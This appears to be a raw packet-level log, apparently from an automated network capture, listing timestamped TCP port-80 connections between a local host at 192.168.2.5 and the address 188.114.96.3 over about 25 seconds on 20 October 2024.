                                                          Oct 20, 2024 18:19:07.943348885 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.945429087 CEST8050037188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.945498943 CEST5003780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.948163986 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:07.948240995 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.949949980 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:07.954756975 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.251403093 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.256268024 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.256339073 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.256623030 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.261507988 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.306811094 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.311779022 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.312191963 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.603768110 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:08.608886957 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.608899117 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.608906984 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.743805885 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.956645012 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:08.956707954 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.030966997 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.103610992 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.120368958 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.120970964 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.125992060 CEST8050039188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.126054049 CEST5003980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.166107893 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.242268085 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.242916107 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.247869968 CEST8050038188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.247940063 CEST5003880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.248065948 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.248141050 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.248241901 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.253257990 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.603818893 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:09.608814955 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.608939886 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:09.608952045 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.041174889 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.166105986 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.296482086 CEST8050040188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.353622913 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.766653061 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.771821022 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:10.771903038 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.772001982 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.775949955 CEST5004080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:10.776973963 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.119282961 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:11.124242067 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.124342918 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.124353886 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.577857971 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:11.791119099 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:11.945928097 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.071830034 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.075223923 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.077678919 CEST8050041188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.077744007 CEST5004180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.080049992 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.080130100 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.080239058 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.085338116 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.431759119 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:12.436624050 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.436650991 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.436662912 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.881131887 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:12.962941885 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.242223024 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.462945938 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.464538097 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.464601994 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.669367075 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.670136929 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.678294897 CEST8050042188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.678350925 CEST5004280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.678778887 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:13.678850889 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.678982973 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:13.684319019 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.025645018 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.030678988 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.030710936 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.030723095 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.138240099 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.143270969 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.143333912 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.143486023 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.148478985 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.494246006 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:14.499154091 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.499255896 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:14.972954035 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.103542089 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.159230947 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.291040897 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.326036930 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.400424004 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.483171940 CEST8050043188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.603545904 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.611520052 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.612179041 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.616848946 CEST8050044188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.616898060 CEST5004480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.617425919 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.617486000 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.617578983 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.623075008 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.977181911 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:15.982254028 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.982381105 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:15.982409954 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:16.402781010 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:16.462899923 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:16.772280931 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:16.853521109 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.089447021 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.090126038 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.094723940 CEST8050045188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:17.094775915 CEST5004580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.094914913 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:17.094974041 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.095060110 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.099848986 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:17.447328091 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:17.452302933 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:17.452316046 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:17.452323914 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:17.883897066 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.096468925 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.096528053 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.248212099 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.291057110 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.367520094 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.368383884 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.372805119 CEST8050046188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.372891903 CEST5004680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.373214960 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.373271942 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.373370886 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.378150940 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.728669882 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:18.733705044 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.733730078 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:18.733773947 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.189091921 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.260906935 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.340392113 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.340852022 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.345356941 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.345474005 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.345555067 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.346158028 CEST8050047188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.346221924 CEST5004780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.350627899 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.464812994 CEST5004380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.466682911 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.472592115 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.472661018 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.472738981 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.477741957 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.697308064 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.702169895 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.702303886 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.822424889 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:20.827430010 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.827455997 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:20.827462912 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:21.143191099 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:21.197284937 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:21.505918980 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:21.556583881 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.314163923 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:22.462821960 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.555253029 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:22.665930986 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.676832914 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.676839113 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.677562952 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.682149887 CEST8050049188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:22.682207108 CEST5004980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.682527065 CEST8050048188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:22.682571888 CEST5004880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.684716940 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:22.684777975 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.684864998 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:22.689722061 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.041135073 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:23.046087027 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.046170950 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.046180964 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.479125977 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.525348902 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:23.706140995 CEST8050050188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.759788036 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:23.837907076 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:23.842905045 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:23.842981100 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:23.843075037 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:23.848161936 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:24.197258949 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:24.202250004 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:24.202263117 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:24.202280045 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:24.645087004 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:24.759761095 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.015683889 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.137738943 CEST5005080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.148287058 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.149324894 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.153829098 CEST8050051188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.153878927 CEST5005180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.154089928 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.154139042 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.154208899 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.158991098 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.509877920 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:25.515014887 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.515029907 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.515038013 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:25.978072882 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.150362015 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.511271954 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.511636019 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.516766071 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.516833067 CEST8050052188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.516880989 CEST5005280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.516880989 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.516957045 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.521822929 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.633330107 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.638289928 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.638401985 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.638482094 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.643253088 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.869173050 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.874147892 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.874185085 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.994359016 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:26.999349117 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.999366999 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:26.999377012 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.329675913 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.384675026 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.434580088 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.563436985 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.603391886 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.648425102 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.651954889 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.803885937 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.853374958 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.933193922 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.933248997 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.934001923 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.938647985 CEST8050053188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.938694954 CEST5005380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.938893080 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.938945055 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.939032078 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.939116001 CEST8050054188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:27.939152002 CEST5005480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:27.943857908 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:28.291043997 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:28.296241045 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:28.296256065 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:28.296266079 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:28.759206057 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:28.806502104 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.185547113 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:29.228377104 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.305869102 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.307118893 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.311706066 CEST8050055188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:29.312740088 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:29.312803984 CEST5005580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.312849998 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.312942982 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.317797899 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:29.665971041 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:29.670978069 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:29.670990944 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:29.671000957 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.144500017 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.353375912 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.374119043 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.465668917 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.492713928 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.492712975 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.497703075 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.497838974 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.497904062 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.498030901 CEST8050056188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.498224974 CEST5005680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.502716064 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.853673935 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:30.858778000 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.858795881 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:30.858807087 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:31.336807013 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:31.451864004 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.651793003 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:31.697551966 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.781847954 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.782593966 CEST5005880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.787341118 CEST8050057188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:31.787393093 CEST5005780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.787440062 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:31.787497997 CEST5005880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.787585020 CEST5005880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:31.792351961 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.134706020 CEST5005880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.139724016 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.139758110 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.139766932 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.571295023 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.573312044 CEST5005880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.573313951 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.578228951 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.578308105 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.578416109 CEST5005980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.578598022 CEST8050058188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.578830004 CEST5005880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.583193064 CEST8050059188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.697930098 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.702800035 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.702883959 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.703001022 CEST5006080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:32.707716942 CEST8050060188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:32.933645010 CEST5005980192.168.2.5188.114.96.3
